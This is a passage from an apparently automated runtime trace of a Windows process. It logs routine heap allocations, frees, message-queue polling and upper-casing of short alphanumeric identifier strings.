wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.034] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0248.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0248.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0248.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0248.036] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0248.036] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0248.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0248.036] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0248.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0248.036] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0248.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0248.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0248.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bf8 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0248.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0248.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0248.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0248.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0248.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0248.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0248.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0248.039] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0248.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0248.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0248.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0248.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0248.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.039] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0248.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0248.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0248.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0248.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0248.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0248.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0248.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.057] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0248.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0248.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0248.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0248.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0248.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0248.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.059] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0248.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0248.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0248.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0248.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0248.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0248.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0248.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0248.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0248.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0248.061] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0248.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa958 [0248.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0248.061] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0248.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0248.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0248.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0248.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0248.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.062] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0248.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0248.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0248.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0248.062] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0248.062] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0248.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0248.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0248.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0248.062] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0248.062] HeapFree (in: hHeap=0x25c0000, 